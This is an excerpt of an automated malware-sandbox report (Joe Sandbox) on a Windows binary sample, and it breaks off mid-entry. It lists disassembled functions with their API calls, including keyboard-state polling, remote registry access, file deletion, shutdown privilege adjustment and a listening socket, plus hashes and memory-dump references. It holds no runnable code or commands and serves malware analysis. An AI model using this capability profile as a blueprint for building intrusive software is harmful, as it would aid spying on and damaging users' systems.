                                    • Instruction Fuzzy Hash: D6615B71904209EFDF11DFA4DC85AEEBB7AFF44710F04826AE815E6391EB319A05DB60
                                    Function 008966E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                    • API String ID: 0-4052911093
                                    • Opcode ID: 420cd0d0cccdbe689b6026c5eedf04e93a4358199f95ec2e5d10ed8a95cea798
                                    • Instruction ID: 432a7dfe1441e6a131fbf26d86bd5a1d812e5cce1cf4008f920c2e2b7c273903
                                    • Opcode Fuzzy Hash: 420cd0d0cccdbe689b6026c5eedf04e93a4358199f95ec2e5d10ed8a95cea798
                                    • Instruction Fuzzy Hash: CF725D71E00219DBDF24DF58D884BAEB7B5FF44314F14816AE849EB390EB749A81CB90
                                    Function 008E001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 008E0097
                                    • SetKeyboardState.USER32(?), ref: 008E0102
                                    • GetAsyncKeyState.USER32(000000A0), ref: 008E0122
                                    • GetKeyState.USER32(000000A0), ref: 008E0139
                                    • GetAsyncKeyState.USER32(000000A1), ref: 008E0168
                                    • GetKeyState.USER32(000000A1), ref: 008E0179
                                    • GetAsyncKeyState.USER32(00000011), ref: 008E01A5
                                    • GetKeyState.USER32(00000011), ref: 008E01B3
                                    • GetAsyncKeyState.USER32(00000012), ref: 008E01DC
                                    • GetKeyState.USER32(00000012), ref: 008E01EA
                                    • GetAsyncKeyState.USER32(0000005B), ref: 008E0213
                                    • GetKeyState.USER32(0000005B), ref: 008E0221
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: aae48c2ffd372018d69b25287b6dd6c260b6de24707f097b3aa3adbd9e7a054e
                                    • Instruction ID: fb3fb48a64a0685f0ebfca1026bf04c12baa1195b7d8401f92e3f10d004bc75b
                                    • Opcode Fuzzy Hash: aae48c2ffd372018d69b25287b6dd6c260b6de24707f097b3aa3adbd9e7a054e
                                    • Instruction Fuzzy Hash: 2D51BA209047C819FB35D7A588547EABFB4EF13380F08499995C59A5C3DAE49BCCCF62
                                    Function 009003DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00900E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008FFDAD,?,?), ref: 00900E31
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009004AC
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0090054B
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009005E3
                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00900822
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0090082F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                    • String ID:
                                    • API String ID: 1240663315-0
                                    • Opcode ID: a91307821bcdac997c93f1130e298420fc64a5c9a5e272d58255e8cf098181bf
                                    • Instruction ID: 50e91338ae8fcc9bd8b1ebbaafe6acb1904802dcee673db4b7337c65f68f9564
                                    • Opcode Fuzzy Hash: a91307821bcdac997c93f1130e298420fc64a5c9a5e272d58255e8cf098181bf
                                    • Instruction Fuzzy Hash: F3E15071204205AFCB14DF28C895E6ABBF9FF89314F04896DF84AD72A1DA31ED05CB52
                                    Function 008F4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: 9b5db1ecaed148fb7c5de2a48045e78476713637ce081874401381dac28244eb
                                    • Instruction ID: 1169f1e2f85aa974027dcc2858ed250b4fd0a8fdcaa757b9785891ec3ed0e180
                                    • Opcode Fuzzy Hash: 9b5db1ecaed148fb7c5de2a48045e78476713637ce081874401381dac28244eb
                                    • Instruction Fuzzy Hash: 2621B1352042199FDB20AF68EC19B7E7BA8FF05310F048026FA46DB271DB31AD40DB85
                                    Function 008E37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00884750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00884743,?,?,008837AE,?), ref: 00884770
                                      • Part of subcall function 008E4A31: GetFileAttributesW.KERNEL32(?,008E370B), ref: 008E4A32
                                    • FindFirstFileW.KERNEL32(?,?), ref: 008E38A3
                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 008E394B
                                    • MoveFileW.KERNEL32(?,?), ref: 008E395E
                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 008E397B
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 008E399D
                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008E39B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 4002782344-1173974218
                                    • Opcode ID: 3efee5bb57aeb8dffe88c2df5a2c2fdc27d8e1054ca0b26e957afdd47175f1d7
                                    • Instruction ID: 5fe99f1f61a9a94ffa989d8d1b63790fedb5b4a23507ef5ad0dee7915abdbcda
                                    • Opcode Fuzzy Hash: 3efee5bb57aeb8dffe88c2df5a2c2fdc27d8e1054ca0b26e957afdd47175f1d7
                                    • Instruction Fuzzy Hash: 2351723180518DAACF11FBA9D9969EDBB79FF16310F600069E406F7192EB316F09CB52
                                    Function 008EF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 008EF440
                                    • Sleep.KERNEL32(0000000A), ref: 008EF470
                                    • _wcscmp.LIBCMT ref: 008EF484
                                    • _wcscmp.LIBCMT ref: 008EF49F
                                    • FindNextFileW.KERNEL32(?,?), ref: 008EF53D
                                    • FindClose.KERNEL32(00000000), ref: 008EF553
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                    • String ID: *.*
                                    • API String ID: 713712311-438819550
                                    • Opcode ID: a3082b9764f19a91a3cafc885bbfa3201879187e99c3f95c43d3f8aca2b3583f
                                    • Instruction ID: a0914c533e4640ac1dc9a7ec3b849200e22c79f487c9775292fe296405e7b561
                                    • Opcode Fuzzy Hash: a3082b9764f19a91a3cafc885bbfa3201879187e99c3f95c43d3f8aca2b3583f
                                    • Instruction Fuzzy Hash: B1419D7190424A9FCF14EF69DC45AEEBBB4FF16314F104466E915E3292EB309A44CF91
                                    Function 0090D43E Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • GetSystemMetrics.USER32(0000000F), ref: 0090D47C
                                    • GetSystemMetrics.USER32(0000000F), ref: 0090D49C
                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0090D6D7
                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0090D6F5
                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0090D716
                                    • ShowWindow.USER32(00000003,00000000), ref: 0090D735
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0090D75A
                                    • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0090D77D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                    • String ID:
                                    • API String ID: 830902736-0
                                    • Opcode ID: 1b0d25844cc347189a4ad8ad9d88b17f1c77a42c5cb329f2ec16d9fbc9bc2742
                                    • Instruction ID: e41675a3fd75d4cdc4710c11cfb7571959463273173470103ae4978ca4174cbb
                                    • Opcode Fuzzy Hash: 1b0d25844cc347189a4ad8ad9d88b17f1c77a42c5cb329f2ec16d9fbc9bc2742
                                    • Instruction Fuzzy Hash: E6B1AA75601229EFDF14CFA8C9C5BAD7BB5FF04701F088069EC489B299D735AA90CB90
                                    Function 00895760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: b4a1b00e8e901252fe8af2bd95611bf85953f55ff1bc064c72a2c9d1ef394118
                                    • Instruction ID: d7b724969d8bbfd6762fc23ecbeafd4243875b423607abd594ce08b64fd7b2da
                                    • Opcode Fuzzy Hash: b4a1b00e8e901252fe8af2bd95611bf85953f55ff1bc064c72a2c9d1ef394118
                                    • Instruction Fuzzy Hash: 2E128D70A00609DFDF14EFA9D981AAEB7F5FF48314F144629E406E7250EB36A914CF51
                                    Function 008E3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00884750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00884743,?,?,008837AE,?), ref: 00884770
                                      • Part of subcall function 008E4A31: GetFileAttributesW.KERNEL32(?,008E370B), ref: 008E4A32
                                    • FindFirstFileW.KERNEL32(?,?), ref: 008E3B89
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 008E3BD9
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 008E3BEA
                                    • FindClose.KERNEL32(00000000), ref: 008E3C01
                                    • FindClose.KERNEL32(00000000), ref: 008E3C0A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 2649000838-1173974218
                                    • Opcode ID: bff4761c10eb1c31594099f0d714266e8ddeac1f387ae7a77f8af37a9533f503
                                    • Instruction ID: edc760ca878efbc862081addc61c044238c4027b59b9aed70d88c7a15204b53b
                                    • Opcode Fuzzy Hash: bff4761c10eb1c31594099f0d714266e8ddeac1f387ae7a77f8af37a9533f503
                                    • Instruction Fuzzy Hash: E0313C710183859FC201FB68D8958AFBBA8FE96314F44492DF4A6D3191EB21DA09DB63
                                    Function 008E51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D882B
                                      • Part of subcall function 008D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8858
                                      • Part of subcall function 008D87E1: GetLastError.KERNEL32 ref: 008D8865
                                    • ExitWindowsEx.USER32(?,00000000), ref: 008E51F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-194228
                                    • Opcode ID: 355835cb9f2854d7aa9956a811b2cef32cc88925a78f1e81e39658a0674f7617
                                    • Instruction ID: 934a89aed192ed264bf778021276ce994a85e8974c75c0cf82db6cae8f2e07bb
                                    • Opcode Fuzzy Hash: 355835cb9f2854d7aa9956a811b2cef32cc88925a78f1e81e39658a0674f7617
                                    • Instruction Fuzzy Hash: AB0176357A56466FFB38226AAC9AFBB7398FB0734CF200421FA13E20C2DA501C008590
                                    Function 008F6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 008F62DC
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F62EB
                                    • bind.WS2_32(00000000,?,00000010), ref: 008F6307
                                    • listen.WS2_32(00000000,00000005), ref: 008F6316
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F6330
                                    • closesocket.WS2_32(00000000), ref: 008F6344
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                    • String ID:
                                    • API String ID: 1279440585-0
                                    • Opcode ID: 130e97485f5cc50369a5e2983da1883202046adea52336317c9ea8483c0f0a4c
                                    • Instruction ID: 5aabf38ba54b0ee743b3a99078ea75d6cb46f966ac3e4dddd186a4801dc72c26
                                    • Opcode Fuzzy Hash: 130e97485f5cc50369a5e2983da1883202046adea52336317c9ea8483c0f0a4c
                                    • Instruction Fuzzy Hash: 2621CE316002099FCB10EF68C845A7EB7B9FF48324F248269EA56E7391D770AD15DB52
                                    Function 00895520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008A0DB6: std::exception::exception.LIBCMT ref: 008A0DEC
                                      • Part of subcall function 008A0DB6: __CxxThrowException@8.LIBCMT ref: 008A0E01
                                    • _memmove.LIBCMT ref: 008D0258
                                    • _memmove.LIBCMT ref: 008D036D
                                    • _memmove.LIBCMT ref: 008D0414
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                    • String ID:
                                    • API String ID: 1300846289-0
                                    • Opcode ID: dd366a7f8701ef1ac6526e17a4bdff6a8baefc56e09ecbccb67c664935008b9d
                                    • Instruction ID: c8d101c399b366571abc873b25a0f6e3f44a13dcc3f32a745ab73416fd90418d
                                    • Opcode Fuzzy Hash: dd366a7f8701ef1ac6526e17a4bdff6a8baefc56e09ecbccb67c664935008b9d
                                    • Instruction Fuzzy Hash: 6C02B070A00209DBDF05EF68D981AAEBBB5FF44304F54816AE80ADB355EB35DA50CF91
                                    Function 00881287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 008819FA
                                    • GetSysColor.USER32(0000000F), ref: 00881A4E
                                    • SetBkColor.GDI32(?,00000000), ref: 00881A61
                                      • Part of subcall function 00881290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008812D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ColorDialogNtdllProc_$LongWindow
                                    • String ID:
                                    • API String ID: 591255283-0
                                    • Opcode ID: 9a399016a2de8df8715ddbac0a1a8fd112875603077beea641ba6d335bb9cd5e
                                    • Instruction ID: 4e85de6f5cad35886860a4093d26479d6b31060d914595b65d1cca002197e60f
                                    • Opcode Fuzzy Hash: 9a399016a2de8df8715ddbac0a1a8fd112875603077beea641ba6d335bb9cd5e
                                    • Instruction Fuzzy Hash: 2FA118B1116568FEDE2CBB28CC4CEBB395DFF42759B14021AF502D62D2DE549D029372
                                    Function 008EBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 008EBCE6
                                    • _wcscmp.LIBCMT ref: 008EBD16
                                    • _wcscmp.LIBCMT ref: 008EBD2B
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 008EBD3C
                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 008EBD6C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
